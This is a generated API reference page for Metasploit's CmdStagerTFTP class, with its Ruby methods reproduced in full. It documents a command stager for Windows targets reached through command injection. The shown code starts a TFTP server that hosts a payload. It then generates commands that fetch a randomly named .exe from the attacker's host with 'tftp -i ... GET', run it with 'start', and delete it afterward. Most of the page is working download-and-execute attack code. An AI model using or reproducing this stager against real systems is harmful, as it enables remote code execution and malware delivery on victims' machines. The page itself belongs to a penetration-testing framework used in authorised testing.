Class: Rex::Exploitation::CmdStagerTFTP
- Inherits:
-
CmdStagerBase
- Object
- CmdStagerBase
- Rex::Exploitation::CmdStagerTFTP
- Defined in:
- lib/rex/exploitation/cmdstager/tftp.rb
Overview
This class provides the ability to create a sequence of commands from an executable. When this sequence is ran via command injection or a shell, the resulting exe will be written to disk and executed.
This particular version uses tftp.exe to download a binary from the specified server. The original file is preserved, not encoded at all, and so this version is significantly simpler than other methods.
Requires: tftp.exe, outbound udp connectivity to a tftp server
Written by Joshua J. Drake
Instance Attribute Summary collapse
-
#exe ⇒ Object
readonly
Returns the value of attribute exe.
-
#payload_exe ⇒ Object
readonly
Returns the value of attribute payload_exe.
-
#tftp ⇒ Object
Returns the value of attribute tftp.
Instance Method Summary collapse
- #cmd_concat_operator ⇒ Object
- #generate(opts = {}) ⇒ Object
- #generate_cmds_decoder(opts) ⇒ Object
- #generate_cmds_payload(opts) ⇒ Object
- #setup(mod) ⇒ Object
- #teardown(mod = nil) ⇒ Object
Methods inherited from CmdStagerBase
#compress_commands, #encode_payload, #generate_cmds, #initialize, #parts_to_commands, #slice_up_payload
Constructor Details
This class inherits a constructor from Rex::Exploitation::CmdStagerBase
Instance Attribute Details
#exe ⇒ Object (readonly)
Returns the value of attribute exe.
77 78 79 |
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 77 def exe @exe end |
#payload_exe ⇒ Object (readonly)
Returns the value of attribute payload_exe.
78 79 80 |
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 78 def payload_exe @payload_exe end |
#tftp ⇒ Object
Returns the value of attribute tftp.
79 80 81 |
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 79 def tftp @tftp end |
Instance Method Details
#cmd_concat_operator ⇒ Object
73 74 75 |
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 73 def cmd_concat_operator ' & ' end |
#generate(opts = {}) ⇒ Object
27 28 29 30 31 32 33 34 35 36 37 38 39 40 |
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 27 def generate(opts = {}) if opts[:tftphost].nil? raise "#{self.class.name}##{__callee__} missing opts[:tftphost]" end opts[:linemax] ||= @linemax opts[:file] ||= "#{Rex::Text.rand_text_alpha(8)}.exe" opts[:temp] ||= '%TEMP%' @payload_exe = opts[:file] @payload_path = opts[:temp] == '.' ? opts[:file] : "#{opts[:temp]}\\#{opts[:file]}" generate_cmds(opts) end |
#generate_cmds_decoder(opts) ⇒ Object
65 66 67 68 69 70 71 |
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 65 def generate_cmds_decoder(opts) cmds = [] cmds << "start \"#{@payload_path}\"" # NOTE: We can't delete the payload while it is running. cmds << "del \"#{@payload_path}\"" unless opts[:nodelete] cmds end |
#generate_cmds_payload(opts) ⇒ Object
53 54 55 56 57 58 59 60 61 62 63 |
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 53 def generate_cmds_payload(opts) cmds = [] # We can skip the destination argument if we're writing to the working directory, # as tftp defaults to writing the file to the current directory with the same filename. if opts[:file] == @payload_path cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:file]}" else cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:file]} \"#{@payload_path}\"" end cmds end |
#setup(mod) ⇒ Object
42 43 44 45 46 47 |
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 42 def setup(mod) self.tftp = Rex::Proto::TFTP::Server.new self.tftp.register_file(@payload_exe, exe) self.tftp.start mod.add_socket(self.tftp) # Hating myself for doing it... but it's just a first demo end |
#teardown(mod = nil) ⇒ Object
49 50 51 |
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 49 def teardown(mod = nil) self.tftp.stop end |